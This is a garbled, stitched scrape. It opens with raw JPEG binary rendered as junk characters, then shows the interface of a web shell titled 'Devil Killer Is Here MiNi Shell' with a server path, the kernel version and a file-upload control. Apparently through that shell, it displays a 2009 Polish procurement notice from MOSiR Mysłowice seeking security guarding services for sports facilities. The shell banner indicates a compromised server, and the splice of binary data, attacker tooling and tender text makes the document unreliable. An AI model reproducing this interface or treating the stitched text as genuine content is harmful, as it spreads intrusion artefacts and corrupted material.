JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090424/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090424/120512-N-2009.html

<p class="kh_header"><b>Mysłowice: Zakup usług pozostałych - Dozorowanie obiektów będących w zarządzie MOSiR Mysłowice.</b><br>
<b>Numer ogłoszenia: 120512 - 2009; data zamieszczenia: 24.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Sportu i Rekreacji , ul. ks. N. Bończyka 32z, 41-400 Mysłowice, woj. śląskie, tel. 032 3171802, faks 032 2221173.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mosir.myslowice.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie  dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: zakład  budżetowy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup usług pozostałych - Dozorowanie obiektów będących w zarządzie MOSiR Mysłowice..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem postępowania jest: zakup usług pozostałych - dozorowanie obiektów będących w zarządzie MOSiR Mysłowice.
2. Zakres zamówienia: bezpośrednia fizyczna ochrona nieruchomości wraz z obiektami i przyległymi terenami zielonymi MOSiR Mysłowice, w tym:
2.1) obiekt sportowy - Mysłowice, ul. Powstańców 23 - Promenada:
- powierzchnia całkowita gruntu: 19.800 m2,
- powierzchnia obiektu budowlanego znajdującego się na terenie: pawilon sportowy o całkowitej powierzchni: 222 m2,
- pozostała infrastruktura: teren ogrodzony z jedną bramą wjazdową.
Dozorowanie obiektu odbywać się będzie codziennie, w godzinach od 1900 do 700 - od dnia zawarcia umowy do 31 grudnia 2009 roku;
2.2) Ośrodek Sportów Letnich Słupna - Mysłowice, ul. Stadionowa:
- powierzchnia całkowita gruntu: 19.395 m2,
- powierzchnia obiektu budowlanego znajdującego się na terenie: zaplecze kontenerowe o łącznej powierzchni zabudowy: 120 m2,
- pozostała infrastruktura: teren ogrodzony z dwoma bramami wjazdowymi.
Dozorowanie obiektu odbywać się będzie codziennie - od dnia zawarcia umowy do 31 grudnia 2009 roku, w godzinach:
a) od dnia zawarcia umowy do dnia 15.05.2009 r. - dozorowanie obiektu w godzinach od 2100 do 700,
b) od dnia 08.06.2009 r. do 31.08.2009 r. - dozorowanie obiektu w godzinach od 2100 do 700,
c) od dnia 01.09.2009 r. do 31.12.2009 r. - dozorowanie obiektu całodobowo,
z wyłączeniem z dozorowania obiektu w następującym okresie:
- od dnia 16.05.2009 r. do dnia 07.06.2009 r.;
2.3) obiekt klubu Górnik 09 - Mysłowice, ul. Gwarków 13:
- powierzchnia całkowita gruntu: 29.376 m2,
- powierzchnia obiektu budowlanego znajdującego się na terenie: budynek klubu sportowego Górnik 09 o powierzchni użytkowej: 1.009 m2,
- pozostała infrastruktura: teren ogrodzony z jedną bramą wjazdową i jednym wejściem.
- wg zał. Nr 9 do siwz;
Dozorowanie obiektu odbywać się będzie codziennie, w godzinach od 2100 do 700 - od dnia zawarcia umowy do 31 grudnia 2009 roku.
3. Realizacja przedmiotu zamówienia odbywać się będzie zgodnie z przepisami ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (Dz. U. Nr 114, poz. 740 ze zm.).
4. Zakres prac związanych z dozorowaniem przedmiotu zamówienia (obiekt sportowy - Mysłowice, ul. Powstańców 23 - Promenada, Ośrodek Sportów Letnich Słupna - Mysłowice, ul. Stadionowa, obiekt klubu Górnik 09 - Mysłowice, ul. Gwarków 13) oraz obowiązki pracowników ochrony na tych obiektach:
- stała, bezpośrednia ochrona fizyczna, pełniona przez jednego, odpowiednio umundurowanego pracownika ochrony, wyposażonego w stałą łączność bezprzewodową z całodobowym stanowiskiem dowodzenia i stacją monitorowania sygnałów alarmowych, posiadającego natychmiastowe wsparcie grupy interwencyjnej,
- wyposażenie posterunku ochrony w system sygnalizacji napadu monitorowany drogą radiową przez Stację Monitorowania Alarmów,
- wyposażenie pracownika ochrony w pilota uruchamiającego system sygnalizacji napadu,
- każdorazowe udokumentowane wpisem do książki służb przyjazdy grup interwencyjnych, w przypadku wystąpienia takiej okoliczności,
- w razie napaści lub zamachu grożącego mieniu zobowiązany jest wszcząć alarm oraz powiadomić mobilny patrol interwencyjny lub patrole interwencyjne, który/które zobowiązany/ne jest/są przybyć na interwencję maksymalnie w ciągu 10 minut od chwili powiadomienia (do każdego z chronionych obiektów), wraz z powiadomieniem właściwych służb (lekarza dyżurującego szpitala/pogotowia ratunkowego, policji, straży pożarnej, itd.),
- natychmiastowe powiadamianie odpowiednich służb w razie pożaru, w razie zagrożenia pożarowego, wprzypadku stwierdzenia kradzieży, włamania bądź usiłowania włamania,
- natychmiastowe powiadamianie zamawiającego o wszystkich nadzwyczajnych wydarzeniach,
- sporządzanie szczegółowych notatek służbowych z przebiegu zdarzeń.
5. Wykonawca zobowiązany jest:
- posiadać zmotoryzowane patrole interwencyjne,
- zapewnić jednakowe umundurowanie pracownikom ochrony, umożliwiające ich identyfikację oraz identyfikację podmiotu zatrudniającego,
- wyposażyć pracowników ochrony w imienne identyfikatory wraz ze zdjęciem,
- wyposażyć pracowników ochrony w środki łączności bezprzewodowej.
6. Bezpośrednia ochrona fizyczna przedmiotu zamówienia polega, w szczególności na:
- stałym nadzorze nad bezpieczeństwem i sprawnością funkcjonowania nieruchomości,
- przeciwdziałaniu próbom włamań, kradzieży i niszczenia mienia, penetracji nieruchomości, niedopuszczaniu do wejścia osób postronnych na teren chronionej nieruchomości,
- podejmowaniu natychmiastowych działań ratunkowych w razie pożaru,
- przeciwdziałaniu negatywnym skutkom innych nadzwyczajnych zdarzeń losowych oraz bezzwłoczna interwencja zmierzająca do zapobieżenia szkodzie lub jej ograniczeniu,
- podejmowaniu wszelkich działań niezbędnych do prawidłowej realizacji usługi ochrony oraz zawiadamiania w razie konieczności Policji, Straży Pożarnej lub Pogotowia Ratunkowego w celu podjęcia stosownych działań,
- niezwłocznego informowania upoważnionego przedstawiciela zamawiającego o wszystkich zdarzeniach istotnych dla ubezpieczenia obiektów,
- ochronie i zabezpieczeniu terenu nieruchomości przed działaniem osób zakłócających porządek publiczny,
- reagowanie na przypadki naruszania przepisów ochrony przeciw pożarowej oraz ustawy o wychowaniu w trzeźwości i przeciwdziałaniu alkoholizmowi - próbom spożywania alkoholu na terenie nieruchomości,
- dozorze mienia mającego charakter prewencyjno-odstraszający, a w razie konieczności bezpośredniej interwencji w sposób zgodny z prawem, łącznie z zatrzymaniem ewentualnego sprawcy zagrożenia lub innego przestępstwa na szkodę zamawiającego i dozorowanego mienia oraz przekazania go wezwanym funkcjonariuszom Policji,
- zapewnieniu środków łączności oraz wsparcia umundurowanej grupy interwencyjnej składającej się z licencjonowanych pracowników ochrony I-go stopnia, wyposażonych w samochód osobowy i przenośne radiotelefony.
7. Wykonawca zobowiązany jest do prowadzenia książki służby, w której odnotowane będą:
- każdorazowe zdanie i przyjęcie służby wraz z uwagami z przebiegu służby,
- godziny rozpoczęcia i zakończenia pracy, jak również wszystkie uwagi oraz zdarzenia zaistniałe w trakcie służby.
8. Upoważniony pracownik zamawiającego będzie wpisywał do książki służby wszelkie uwagi, spostrzeżenia i zalecenia, co do sposobu i formy świadczonych usług będących przedmiotem zamówienia.
9. Wykonawca, który podpisze umowę z zamawiającym, przyjmuje na siebie odpowiedzialność materialną do pełnej wysokości za szkody powstałe w wyniku nienależytej realizacji usługi ochrony mienia i zobowiązuje się do pokrycia należności za ewentualne szkody powstałe w związku z nienależytym wykonaniem usługi..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4, 79.71.50.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Wykonawca jest zobowiązany do wniesienia wadium w wysokości 2.000,00 zł (słownie: dwa tysiące złotych 00/100),
2. Wadium może być wniesione w jednej lub kilku następujących formach:
- pieniądzu,
- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
- gwarancjach bankowych,
- gwarancjach ubezpieczeniowych,
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia
9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. zm.).
3. Wadium wnoszone w formie pieniężnej należy wpłacić wyłącznie przelewem na rachunek bankowy: Miejski Ośrodek Sportu i Rekreacji Mysłowice, Bank Pekao S.A., nr 22 1240 4227 1111 0000 4848 6031. Wadium musi znajdować się na koncie Zamawiającego w terminie określonym w uPzp, przy czym wykonawca poprzez załączenie do składanej oferty dowodu wpłaty wykazuje Zamawiającemu, że wpłacenie nastąpiło w czasie niezbędnym do spełnienia wcześniej określonego wymogu.
4. Oryginał wadium, wniesionego w formie niepieniężnej łącznie z pisemną dyspozycją wykonawcy
o wyłączeniu tegoż dokumentu z oferty po zaistnieniu podstaw do zwrotu wadium, należy dołączyć do oferty.
5. Wadium wniesione w innej formie niż w pieniądzu winno zawierać bezwzględne i nieodwołalne zobowiązanie podmiotu udzielającego gwarancji lub poręczenia wypłaty kwoty wadium na każde żądanie Zamawiającego w wypadkach wymienionych w art. 46 ust. 4a i 5 ustawy Prawo zamówień publicznych.
6. Wadium wnoszone w pieniądzu zachowuje ważność przez cały okres jego przechowywania na rachunku bankowym. Wadium wnoszone w formie niepieniężnej musi być ważne co najmniej od dnia, w którym przypada termin składania ofert, do dnia, w którym upływa termin związania ofertą (jeżeli przypada na dzień ustawowo wolny od pracy, to do pierwszego dnia następującego po dniu ustawowo wolnym od pracy).
7. Zamawiający zatrzyma wadium wraz z odsetkami w przypadku zaistnienia okoliczności, o których mowa w art. 46 ust. 4a i 5 ustawy Prawo zamówień publicznych.
8. Zwrot wadium następuje w/g przepisów ustawy Prawo zamówień publicznych.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Opis warunków udziału w postępowaniu (z uwzględnieniem ich znaczenia, jeżeli dotyczy) oraz opis sposobu dokonywania oceny spełniania tych warunków:
1. W postępowaniu mogą wziąć udział wykonawcy, którzy:
1.1) w odniesieniu do warunku, o którym mowa w art. 22 ust. 1 pkt 1 uPzp, obowiązkiem jest wykazanie posiadania uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, tj. wykażą, iż:
1.1.1) posiadają aktualną koncesję wydaną przez Ministerstwo Spraw Wewnętrznych i Administracji na podjęcie działalności gospodarczej w zakresie wykonywania usług ochrony osób i mienia na podstawie art. 14 ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (Dz. U. Nr 114, poz. 740 ze zm.);
1.2) w odniesieniu do warunku, o którym mowa w art. 22 ust. 1 pkt 2, obowiązkiem jest wykazanie posiadania niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia tj. wykazania, iż:
1.2.1) wykonali należycie w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum 3 usługi podobne do objętych przedmiotem zamówienia, oraz załączenie dokumentu potwierdzającego, że usługi te zostały wykonane należycie, tj. referencje lub protokoły odbioru w celu potwierdzenia doświadczenia zawodowego - zał. Nr 2 do siwz;
Za usługę podobną zamawiający uzna: objęcie ochroną fizyczną (dozorem) minimum 1 obiektu.
1.2.2) dysponują lub będą dysponować:
a) radiotelefonem - minimum 3 szt.,
b) samochodem osobowym wyposażonym w przenośny środek łączności - 2 szt.
- zał. Nr 3 do siwz;
1.2.3) dysponują lub będą dysponować minimum 8 osobami, które będą uczestniczyć w wykonywaniu zamówienia i będą posiadały następujące kwalifikacje zawodowe, doświadczenie i wykształcenie oraz zakres wykonywanych czynności, w tym:
1) kierownik - pełniący całodobowy nadzór nad wykonywanym przedmiotem zamówienia oraz pracownikami wykonującymi niniejszą usługę - nie mniej niż 1 osoba, posiadającą:
- kwalifikacje zawodowe: licencja I stopnia,
- doświadczenie: staż zawodowy liczony wyłącznie z pracy w ochronie, policji, straży miejskiej lub jako żołnierz zawodowy,
- wykształcenie: min. wykształcenie średnie;
2) pracownik ochrony fizycznej - nie mniej niż 7 osób,
- zał. Nr 4 do siwz;
1.3) w odniesieniu do warunku, o którym mowa w art. 22 ust. 1 pkt 3, obowiązkiem jest wykazanie, iż znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia tj. wykażą, iż:
1.3.1) posiadają środki finansowe w wysokości nie mniejszej niż 100.000,00 zł brutto (sto tysięcy złotych 00/100) lub posiadają zdolność kredytową w zakresie wykonania przedmiotu zamówienia na wartość nie mniejszą niż 100.000,00 zł brutto (słownie: sto tysięcy złotych 00/100) oraz załączenie dokumentów potwierdzających te środki finansowe lub tę zdolność kredytową;
1.3.2) są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności, o wysokości sumy ubezpieczenia nie mniejszej niż: 300.000,00 zł (słownie: trzysta tysięcy złotych 00/100),
- w przypadku sumy ubezpieczenia wykazanej w walucie obcej, zamawiający przyjmie, iż sumą ubezpieczenia jest iloczyn wykazanej sumy ubezpieczenia i średniego kursu tej waluty, określonego przez Narodowy Bank Polski na dzień wszczęcia postępowania o udzielenie niniejszego zamówienia;
1.4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 uPzp.
2. Ocena spełniania warunków udziału w postępowaniu określonych jw. nastąpi na podstawie załączonych do oferty: oświadczenia (zał. Nr 1 do siwz lub zał. Nr 1a do siwz) oraz dokumentów, o których mowa poniżej, wg formuły: spełnia / nie spełnia.
Z treści załączonych do oferty dokumentów musi wynikać jednoznacznie, że ww. warunki wykonawca spełnił..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Na podstawie art. 44 uPzp, wykonawca składa wraz z ofertą:
- oświadczenie o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 uPzp - z wykorzystaniem wzoru określonego w zał. Nr 1 do siwz, oraz 1.1) w celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 uPzp, następujący dokument:
1.1.1) aktualną koncesję, jeżeli ustawy nakładają obowiązek posiadania koncesji na podjęcie działalności gospodarczej w zakresie objętym zamówieniem publicznym;
1.1.2) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawiony/ne/ nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
1.1.3) aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;
1.1.4) aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;
1.1.5) aktualną informację z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4) - 8) ustawy - wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
1.1.6) aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust 1 pkt 9) ustawy - wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
W przypadku składania oferty wspólnej dokumenty, o których mowa w punktach od 1.1.1) do 1.1.6), składa oddzielnie każdy z wykonawców składających ofertę wspólną;
1.2) w celu potwierdzenia opisanego przez zamawiającego warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, następujące dokumenty:
1.2.1) wykaz wykonywanych usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że te usługi zostały wykonane należycie - zał. Nr 2 do siwz;
1.2.2) wykaz niezbędnych do wykonania narzędzi i urządzeń, którymi dysponuje lub będzie dysponował wykonawca - zał. Nr 3 do siwz;
1.2.2a) pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, jeżeli w wykazie, o którym mowa w ppkt. 1.2.2), wykonawca wskazał narzędzia i urządzenia, którymi będzie dysponował;
1.2.3) wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności - zał. Nr 4 do siwz;
1.2.3a) pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia narzędzi i urządzeń, jeżeli w wykazie, o którym mowa w ppkt. 1.2.3), wykonawca wskazał osoby, którymi będzie dysponował;
1.2.4) dokument stwierdzający, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
1.3) w celu potwierdzenia opisanego przez zamawiającego warunku znajdowania się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, następujące dokumenty:
1.3.1) informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
1.3.2) polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia:
2.1) składają oświadczenie o spełnieniu warunków udziału w postępowaniu (zał. Nr 1a do siwz);
2.2) oddzielnie wykazują, iż posiadają uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlegają wykluczeniu na podstawie art. 24 uPzp,
- na potwierdzenie w/w warunku każdy z wykonawców z osobna składa dokument, o którym mowa w ppkt. 1.1;
2.3) wspólnie wykazują, iż:
2.3.1) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia,
- na potwierdzenie ww. warunku wykonawcy wspólnie przedkładają dokument(y), o którym(ch) mowa w ppkt. 1.2,
- dla oceny spełnienia warunków udziału w postępowaniu określonych w ppkt 1.2.1, 1.2.2 i 1.2.3 sumowaniu podlega doświadczenie oraz potencjał techniczny w/w wykonawców;
2.3.2) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, - na potwierdzenie ww. warunku wykonawcy wspólnie przedkładają dokumenty, o których mowa w ppkt. 1.3,
- dla oceny spełnienia warunków udziału w postępowaniu określonych w ppkt 1.3.1 i 1.3.2 sumowaniu podlega potencjał ekonomiczny i finansowy ww. wykonawców,
- w przypadku złożenia oferty przez wspólników spółki cywilnej dokumenty, o którym mowa w ppkt. 1.3.2 muszą być wystawione na wspólnika/ów/ spółki cywilnej;
2.4) obowiązane są załączyć do oferty pełnomocnictwo, zgodnie z którym ustanawiają pełnomocnika do reprezentowania w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
Dokument z którego wynika ustanowienie pełnomocnika musi być podpisany przez osobę/osoby/ uprawnioną/e/ do reprezentowania z osobna każdego z wykonawców wspólnie ubiegających się o udzielenie zamówienia, zgodnie z aktualnym odpisem z właściwego rejestru lub aktualnym zaświadczeniem o wpisie do ewidencji działalności gospodarczej.
Dokument z którego wynika ustanowienie pełnomocnika należy złożyć w formie oryginału lub kopii poświadczonej notarialnie.
3. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentów, o których mowa w:
- ppkt. 1.1.2, 1.1.3, 1.1.4, 1.1.6 - składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości,
- ppkt. 1.1.5 - składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 uPzp.
4. Dokumenty, o których mowa w pkt. 3 powinny być wystawione przed upływem terminu składania ofert - zgodnie z terminami określonymi w ust. 2 § 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 87, poz. 605).
5. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. 3, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.
Zapisy, o których mowa w pkt 4 stosuje się odpowiednio.
6. Złożenie dokumentów potwierdzających spełnienie warunków udziału w postępowaniu sporządzonych w języku obcym jest dopuszczalne wraz z załączeniem tłumaczenia na język polski, poświadczonego przez osobę/osoby/ uprawnioną/e/ do reprezentowania wykonawcy, zgodnie z aktualnym odpisem z właściwego rejestru lub aktualnym zaświadczeniem o wpisie do ewidencji działalności gospodarczej albo udzielonym pełnomocnictwem.
